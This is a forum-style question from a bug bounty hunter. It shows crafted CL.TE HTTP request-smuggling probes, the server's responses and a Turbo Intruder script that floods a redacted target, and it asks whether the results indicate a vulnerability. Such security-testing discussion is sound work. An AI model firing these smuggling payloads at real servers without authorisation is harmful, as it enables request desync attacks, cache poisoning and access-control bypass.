i try to find http smuggling in big bug bouny program
if i send this to the server
POST /path HTTP/1.1
Host: subdomain.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: Keep-Alive
Content-Length: 6
Transfer-Encoding: chunked
0
j
i get
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Length: 0
Date: Fri, 12 Mar 2021 21:29:47 GMT
Location: http://somewhere.com
Via: 1.1 somewhere
Alt-Svc: clear
in the response
and if i send to server this:
ePOST /path HTTP/1.1
Host: subdomain.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Connection: Keep-Alive
Content-Length: 5
Transfer-Encoding: chunked
0
i get in return:
HTTP/1.1 404 Not Found
Content-Length: 19
Content-Type: text/plain; charset=utf-8
Date: Fri, 12 Mar 2021 21:33:42 GMT
X-Content-Type-Options: nosniff
Via: 1.1 somewhere
Alt-Svc: clear
404 page not found
now i try to look for a cl.te attack so i send the first requerst
POST /path HTTP/1.1
Host: subdomain.domain.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0%s
Connection: Keep-Alive
Content-Length: 5
Transfer-Encoding: chunked
0
e
to turbo intruder, with this script:
def queueRequests(target, wordlists):
engine = RequestEngine(endpoint=target.endpoint,
concurrentConnections=1,
requestsPerConnection=3,
pipeline=False
)
for word in range(1000):
engine.queue(target.req, "")
def handleResponse(req, interesting):
table.add(req)
and i get 302 1 time and 404 49 time over and over again.
so when i see this it looks like this website has http smuggling but
when i try to use it to go to an Unauthorized place i get 401 like always
and when i send a lot of request i never even once got a bad request on a regular request
can someone tell me if thar is a http smuggling? and if not why does it look like i have?
